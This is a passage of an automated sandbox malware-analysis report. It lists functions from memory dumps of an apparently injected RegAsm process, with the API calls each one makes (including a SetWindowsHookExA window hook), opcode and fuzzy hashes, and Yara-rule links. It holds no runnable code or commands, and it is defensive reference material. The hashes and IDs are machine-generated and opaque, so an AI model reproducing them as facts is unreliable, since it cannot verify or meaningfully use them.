                                • Instruction ID: 49f2937090a9f078b018dcea5718e78cb72a08f9ee8240f3beeb63d65b8fc51c
                                • Opcode Fuzzy Hash: 7853865c0deaa5df87d74e6b8c850cdba61ee4e1856b8bed726b7c10532b49a6
                                • Instruction Fuzzy Hash: 4B21DFB18043888FCB50DFADD8447DEBFF4EF49324F24449AD598A7251C374A984CBAA
                                Function 060FA160 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060FA1E3
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 889658efb9b774af57ebd4582c8121d6dd77280d97827b14f20deb3b9d99047f
                                • Instruction ID: 89097211fb1a5e71987edb44a52a4a97d1935d83b5df31d6643a84c19d22fe7d
                                • Opcode Fuzzy Hash: 889658efb9b774af57ebd4582c8121d6dd77280d97827b14f20deb3b9d99047f
                                • Instruction Fuzzy Hash: 992132B1900209DFCB54CF9AC844BEEFBF5BB88320F10842AE458A7250CB74A944CFA5
                                Function 060FA168 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 060FA1E3
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: ae522e08c6c6d86ca4d273fce74e4079f5335a8010201b7eed4ae524e4955ae0
                                • Instruction ID: 05f33d56b7fd9f4ae5947ba86a3b084374df78bf54f475d63847f63f37f5baa8
                                • Opcode Fuzzy Hash: ae522e08c6c6d86ca4d273fce74e4079f5335a8010201b7eed4ae524e4955ae0
                                • Instruction Fuzzy Hash: EB2124B5D00249DFCB54DF9AC844BEEFBF5BB88320F14842AD458A7250CB74A944CFA5
                                Function 00EAF3B8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00EAF41F
                                Memory Dump Source
                                • Source File: 00000003.00000002.3558473581.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_ea0000_RegAsm.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: bc9f55309624ee5ab1c3c3388ad655dd4d28ab7b8240607cb07a78bdcdcf1851
                                • Instruction ID: 6456c24eafcfe33ca4f197977f6bc37c2e5b62333e1593b0fb2eb3edcc9d495e
                                • Opcode Fuzzy Hash: bc9f55309624ee5ab1c3c3388ad655dd4d28ab7b8240607cb07a78bdcdcf1851
                                • Instruction Fuzzy Hash: AD11F0B2C0066A9BCB10DF9AC544BDEFBF4AF49324F14816AD818B7250D778A944CFA5
                                Function 060F03F4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 060F1B16
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: b2dd7d5028434081a0951f46afebe662cbfdbe2e47d6a17d86e0d6b4a6614d84
                                • Instruction ID: 935a663e47620810a065b99313dcef0b6e57ff97cc30a3ddca0e05ad9599047a
                                • Opcode Fuzzy Hash: b2dd7d5028434081a0951f46afebe662cbfdbe2e47d6a17d86e0d6b4a6614d84
                                • Instruction Fuzzy Hash: 191132B5C00289CFCB10CF9AC844ADEFBF4EB88320F10846AD919B7610D375A545CFA5
                                Function 060F1AAB Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 060F1B16
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 89bbc9a8a627c9050f55dcbad1b9703ffce021b7b2d4550a4d37669c79cdbb2f
                                • Instruction ID: a3c1ec6507d3e43891e9df188b71232c579cde0218955c115d802f821addf17d
                                • Opcode Fuzzy Hash: 89bbc9a8a627c9050f55dcbad1b9703ffce021b7b2d4550a4d37669c79cdbb2f
                                • Instruction Fuzzy Hash: 9B1132B5C00689CFDB10DF9AC844ADEFFF4AB49320F14846AD418B7610C374A545CFA1
                                Function 060F8629 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060F8685
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 27c67977a14764815cb38b1c925e6555356d4088d8ce606b1f85b0ee6fb30963
                                • Instruction ID: a06e587c347655317c8edc7c7ea32bae03b5777954186c973d0f7b275a3731c1
                                • Opcode Fuzzy Hash: 27c67977a14764815cb38b1c925e6555356d4088d8ce606b1f85b0ee6fb30963
                                • Instruction Fuzzy Hash: 111112B5C002988FCB60CF9AD544BDEBFF4EB48324F24885AE558A7610C335A984CFA5
                                Function 060F673C Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,060F7D45), ref: 060F7DCF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: c9cb6d9d8bf840d59ac562ef150ccd8213b841494288fe3a640e23db06efc993
                                • Instruction ID: 8b2d607b115ec3c21eed56a58ec1fd0652a22e489fe6f98139e3e50c546bf227
                                • Opcode Fuzzy Hash: c9cb6d9d8bf840d59ac562ef150ccd8213b841494288fe3a640e23db06efc993
                                • Instruction Fuzzy Hash: DC1145B1800248CFCB60DF9AD844BEEFFF4EB48324F20842AD519A7640C374A984CFA5
                                Function 060F8028 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                Download Yara Rule
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060F8685
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 3c2577034aa93fb15e01f3f671b2f56bc6a3b93c0667feca84f740431a34223c
                                • Instruction ID: 26d4577f4639c48a56a67872795241c7e940ee0340e5fe8cbd49981a768ba5ea
                                • Opcode Fuzzy Hash: 3c2577034aa93fb15e01f3f671b2f56bc6a3b93c0667feca84f740431a34223c
                                • Instruction Fuzzy Hash: BD1103B19103588FCB60DF9AC544BDEBFF4EB48324F148459E518A7610C375A944CFA5
                                Function 060F7D68 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,060F7D45), ref: 060F7DCF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561712353.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_60f0000_RegAsm.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: d08587cfd40e78bae53b1fbd30d835caf5a722868e57f714e2b4d8064ff6a80c
                                • Instruction ID: 7381f5ba5ac9ff4711aadf294982341f0da58c70f7e6a92875373055063a8266
                                • Opcode Fuzzy Hash: d08587cfd40e78bae53b1fbd30d835caf5a722868e57f714e2b4d8064ff6a80c
                                • Instruction Fuzzy Hash: E61145B1800248CFCB10CF99D844BEEFFF4EB88324F20841AD519A7650C774A944CFA5
                                Function 06174B28 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: XPcq
                                • API String ID: 0-714321711
                                • Opcode ID: 53917708de7dbaaf201df2813e2e822b7771f141f836cfbd1c502209ab6ffc73
                                • Instruction ID: 86584fa149352af8ff9de32c9c3e768e19b815fa54a95d91c2fd637f68b5c1a7
                                • Opcode Fuzzy Hash: 53917708de7dbaaf201df2813e2e822b7771f141f836cfbd1c502209ab6ffc73
                                • Instruction Fuzzy Hash: ED51D130B002189FDB059FB8C854BAEBFF6EF89700F20856AE145EB395DA748D45CB95
                                Function 0617DAAD Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH^q
                                • API String ID: 0-2549759414
                                • Opcode ID: 0b6f877fa4b9bc79266d83fee4cea6b5a2f1af7877e17a421602f7bc62602802
                                • Instruction ID: 8f8179fe1ee6a725bb569700d9591aff29bf388137c30ce4c84b7313c84109d5
                                • Opcode Fuzzy Hash: 0b6f877fa4b9bc79266d83fee4cea6b5a2f1af7877e17a421602f7bc62602802
                                • Instruction Fuzzy Hash: FF41AF30E0434A9FDB65DF74D9507AEBBB2BF86300F24896AD405EB250DB71E946CB81
                                Function 061721F0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH^q
                                • API String ID: 0-2549759414
                                • Opcode ID: 86d68f474a2b72a9e69b863769265627f54071a5a0a595dba00a9f0be30baa48
                                • Instruction ID: f4a9b9578f5b8c81f4ebdceb64b89d8d1618eccab3ad0019db4c8ed053cbd85f
                                • Opcode Fuzzy Hash: 86d68f474a2b72a9e69b863769265627f54071a5a0a595dba00a9f0be30baa48
                                • Instruction Fuzzy Hash: 8131EB30B142058FDB59AB74C51476E7BF2AB89600F20486AD406EB395EF35DE46CBA1
                                Function 0617FED0 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: |
                                • API String ID: 0-2343686810
                                • Opcode ID: 4d218e45e6df2c15ea9c31bf8c368758014f364c1322922c0aa016461c9ac3b0
                                • Instruction ID: 1f2a5d04ccaf043631e7f73cb6b88117cf924da4364d5cd6814e29501a637f52
                                • Opcode Fuzzy Hash: 4d218e45e6df2c15ea9c31bf8c368758014f364c1322922c0aa016461c9ac3b0
                                • Instruction Fuzzy Hash: 7B117F71B402219FDB54DF788804B6E7BF2AF8C700F14446EE54AEB3A0DB759901CB80
                                Function 0617FEE0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: |
                                • API String ID: 0-2343686810
                                • Opcode ID: ce22ff40a5ca90fc86f47c753b5e0a6acb396958bb65cfc3fa0c15c5fee0ed2b
                                • Instruction ID: 2f3208549b4aa6322844e4f388ae3602048b84285d4e7327aee27cd161b70e12
                                • Opcode Fuzzy Hash: ce22ff40a5ca90fc86f47c753b5e0a6acb396958bb65cfc3fa0c15c5fee0ed2b
                                • Instruction Fuzzy Hash: 01115E71B402249FDB549B78C804B6E77F5AF4C700F104469E50AEB3A0DB75A901CB81
                                Function 061782F6 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q
                                • API String ID: 0-388095546
                                • Opcode ID: 66e00f7fb6545dac9384b2b2e222de07811425a68cd8b2a7a59fa4bba2b6a390
                                • Instruction ID: b34fc0872a4cb117067ddc380fbc32b5bfbf6d44c289a24c4ae6af6883b1a285
                                • Opcode Fuzzy Hash: 66e00f7fb6545dac9384b2b2e222de07811425a68cd8b2a7a59fa4bba2b6a390
                                • Instruction Fuzzy Hash: 62F0ED3AF08200CFEFE8CA4DE9885BC73B9EB40256F150872D805CB205C734CA02C6A1
                                Function 06174641 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Ocq
                                • API String ID: 0-2995510325
                                • Opcode ID: 8c3b1ab19d4e79151c33300a9577a1cff9ca840cc335a4fda8a4c258f9c20d02
                                • Instruction ID: 8507951d5808e241bce5e8450028174969d1304077df5b01cae2d4964b00e0e9
                                • Opcode Fuzzy Hash: 8c3b1ab19d4e79151c33300a9577a1cff9ca840cc335a4fda8a4c258f9c20d02
                                • Instruction Fuzzy Hash: 23F0DA30A50129DBDB14DF94E859BAEBBB2BF84B00F20451AE402A7294CBB45D45CF80
                                Function 06172368 Relevance: 1.0, Instructions: 1008COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 597c2ae102ac17560117634eb403d85dc762b686fb0a7c5c12b42a4481544672
                                • Instruction ID: b8824a16632c12996f4653435e7733b7bea79770fe51a601a2fd0f31867ceb60
                                • Opcode Fuzzy Hash: 597c2ae102ac17560117634eb403d85dc762b686fb0a7c5c12b42a4481544672
                                • Instruction Fuzzy Hash: E7924834A002048FDB64DB68C584A5DBBF2FF49314F5488AAE459EB365DB35ED86CF80
                                Function 061761F0 Relevance: .2, Instructions: 229COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a28318d663517dc107c37a1e276a7d3bad9cbcef8559354bb899b82503d13928
                                • Instruction ID: 10170d3e2b405a4b769bef832e47db1eec2663f24b7fc8204fdbcad85a8a221d
                                • Opcode Fuzzy Hash: a28318d663517dc107c37a1e276a7d3bad9cbcef8559354bb899b82503d13928
                                • Instruction Fuzzy Hash: 1261D071F004214FCB549A7EC89466FBAE7AFC4620B25443AE80EDB364DF66DD0287C2
                                Function 06173E89 Relevance: .2, Instructions: 226COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b19657041a5264c568c8fbf0d8ee8ab510814fccf0115f1d49bcf78cbb4b803b
                                • Instruction ID: 83a7e49cd6055493be4b63b6b3db8db70f1b29cdab81dbda445c06cc180e056a
                                • Opcode Fuzzy Hash: b19657041a5264c568c8fbf0d8ee8ab510814fccf0115f1d49bcf78cbb4b803b
                                • Instruction Fuzzy Hash: 80815130B042099FDF58EBB8D4547AEB7F2AF89304F148429D41ADB354EB74EC428B92
                                Function 061741A8 Relevance: .2, Instructions: 221COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c249e14683b48271eda8e67282f10ce8ff705f4b0ec9a96bedcf9f95d2cb60b1
                                • Instruction ID: a35040eb6629c5751194d49cfe055d66e843c40fd936f678b28c11b092ddd337
                                • Opcode Fuzzy Hash: c249e14683b48271eda8e67282f10ce8ff705f4b0ec9a96bedcf9f95d2cb60b1
                                • Instruction Fuzzy Hash: 2F912E34E102198FDF60DF68C890B9DBBB1FF89310F208599D549FB295DB70AA85CB51
                                Function 061741C0 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78c42e357a696e8e1f3b77d0521819a5a76e950cff6307418dc7a28ea4700af3
                                • Instruction ID: 1c784bbb6797ec4606c5ea496f3ac9dee57c67346490b54d473cb5cbec2aeced
                                • Opcode Fuzzy Hash: 78c42e357a696e8e1f3b77d0521819a5a76e950cff6307418dc7a28ea4700af3
                                • Instruction Fuzzy Hash: 9F912B34E102198BDF60DF68C880B9DB7B1FF89310F208599D549BB255EB70AA85CF91
                                Function 0617EAF9 Relevance: .2, Instructions: 207COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 542cee1504fdf9265ef4dd652d099e65860b2552b256f4f6c85bbe11fbd87816
                                • Instruction ID: e85c6bcebbbe6a69c36e692f30cea458400655284d90764644aa9849ce197a78
                                • Opcode Fuzzy Hash: 542cee1504fdf9265ef4dd652d099e65860b2552b256f4f6c85bbe11fbd87816
                                • Instruction Fuzzy Hash: 9D712F30A006099FDB54DFA9D980AADBBF6FF88300F1484AAE415EB355DB30ED46CB50
                                Function 0617FC70 Relevance: .2, Instructions: 202COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 47832b2fcb1d200fec9a1774d943681d2fee550df220e571ff1e3f487ba7bb7d
                                • Instruction ID: c7a0e2f12a98c9b1871d7a13dd745b59360728d7353036e157340b8017e83123
                                • Opcode Fuzzy Hash: 47832b2fcb1d200fec9a1774d943681d2fee550df220e571ff1e3f487ba7bb7d
                                • Instruction Fuzzy Hash: 1761D231E00109DFDF24AB78E8447AEBBB2EF89315F20886AE509D7251DF359946CB81
                                Function 0617EB08 Relevance: .2, Instructions: 201COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bb2b208a9def78f7800ae9879a096e43e73d03767c51d1de3ee9dc9c0f05b5c
                                • Instruction ID: de305d741a9c38f3bb203e2240c51d50a8e0da846c9e11d3c648a2f47d5f94b0
                                • Opcode Fuzzy Hash: 6bb2b208a9def78f7800ae9879a096e43e73d03767c51d1de3ee9dc9c0f05b5c
                                • Instruction Fuzzy Hash: 03711E30A006099FDB54DFA9D980AADBBF6FF88304F14846AE419EB355DB30ED46CB50
                                Function 0617FA20 Relevance: .2, Instructions: 172COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95167019305c1b9a83fef06bef693e336a37a57dfa6b1300fea09880dda76b61
                                • Instruction ID: 6d8abd875c5e27f3ff1c09f6d833695e5f022fc8544a819aed90d701911e9a24
                                • Opcode Fuzzy Hash: 95167019305c1b9a83fef06bef693e336a37a57dfa6b1300fea09880dda76b61
                                • Instruction Fuzzy Hash: AD512B34B146049FEF74667CD99472F3A6ED789310F20487AE50AD73E5CB69CC4683A2
                                Function 0617FA30 Relevance: .2, Instructions: 163COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 69923103c9da1ac47ede56732ba0192d6baf72f2f0b12b2f9d6172f84855a06a
                                • Instruction ID: 12faaacb295427237ca87f191d76f831366eec3911b19e818c705a8f1e1cd304
                                • Opcode Fuzzy Hash: 69923103c9da1ac47ede56732ba0192d6baf72f2f0b12b2f9d6172f84855a06a
                                • Instruction Fuzzy Hash: F8511A34B146089FFF74666CD99472F266ED789310F20483AE50AD73E8CB69DC8643A2
                                Function 06175400 Relevance: .1, Instructions: 132COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 35f19233d427c28f857f8a84b269aee4259551a9de76fcedf248b25eb9f99730
                                • Instruction ID: 5ac02a93049311797389657105be5ca366c7c4305a821a03c4b9e69079962599
                                • Opcode Fuzzy Hash: 35f19233d427c28f857f8a84b269aee4259551a9de76fcedf248b25eb9f99730
                                • Instruction Fuzzy Hash: 0C415C71E006099FDF60CFA9D8C0AAEFBF3EB85310F10492AD256D7651DB30E9558B90
                                Function 061720A0 Relevance: .1, Instructions: 101COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ae74b147a356ca117b274e491b5bb1f5e64e7675494947b2f70f4d3266f5dfe8
                                • Instruction ID: 93e996cd8cc5d607f66c88044e8034bd0f43383834bf557c6f61745f43a5b86a
                                • Opcode Fuzzy Hash: ae74b147a356ca117b274e491b5bb1f5e64e7675494947b2f70f4d3266f5dfe8
                                • Instruction Fuzzy Hash: C5319030E006099FCB19DFA5D85469EBBB6BF8A300F10846AE906EB341DB71E946CB51
                                Function 061720B0 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b54f9070df19e5fb6451a225538f86a1d9620085dd80d0d0a58b65dc77b4a592
                                • Instruction ID: 4fda3d00d0c221429584ac94f8c616917f6f24e2f561e9ecfaa155fcd68ba9fb
                                • Opcode Fuzzy Hash: b54f9070df19e5fb6451a225538f86a1d9620085dd80d0d0a58b65dc77b4a592
                                • Instruction Fuzzy Hash: 0F317C30F106199BCB59DFA5D85469EBBF6BF89300F10852AE906EB340DB71ED42CB50
                                Function 06173A91 Relevance: .1, Instructions: 82COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 66ebbd5b2f9172e5c9558b04ed6d835fd388c697280c583d8846ac21a074cccd
                                • Instruction ID: 690b2717a1322eb6da00fcdb608ea884e05af6eb1c10cb5322767470cb557945
                                • Opcode Fuzzy Hash: 66ebbd5b2f9172e5c9558b04ed6d835fd388c697280c583d8846ac21a074cccd
                                • Instruction Fuzzy Hash: 4921D174F042059FDB50DF79D880AAEBBF6AB88710F148429E959E7384E730E801CB95
                                Function 06173AA0 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19fe78c77cf8ffd854cafe9f2da5ddb0c49f7194f45372f233b43716510ef5c8
                                • Instruction ID: 8cc7fcbd3e327a830437855762bd1c5982453253ba49931779477b5e96503cb0
                                • Opcode Fuzzy Hash: 19fe78c77cf8ffd854cafe9f2da5ddb0c49f7194f45372f233b43716510ef5c8
                                • Instruction Fuzzy Hash: BF21B071F046059FDB50DF79D880AAEBBF5EB88710F108029E919EB394E730E801CB94
                                Function 00C0D005 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3557928320.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_c0d000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fd2240c46e0ca7644b28e283c74da643bf81694fa60bdf6df8546699a661d0e4
                                • Instruction ID: d0941d8985701e44c4da4cdae3b71c9554b0e2b238a53f38539eedd79c735fef
                                • Opcode Fuzzy Hash: fd2240c46e0ca7644b28e283c74da643bf81694fa60bdf6df8546699a661d0e4
                                • Instruction Fuzzy Hash: 6B316D7150D3C49FCB03CB64C990711BF71AB46214F29C5DBD9898F2A3C23A980ACB62
                                Function 00C0D030 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
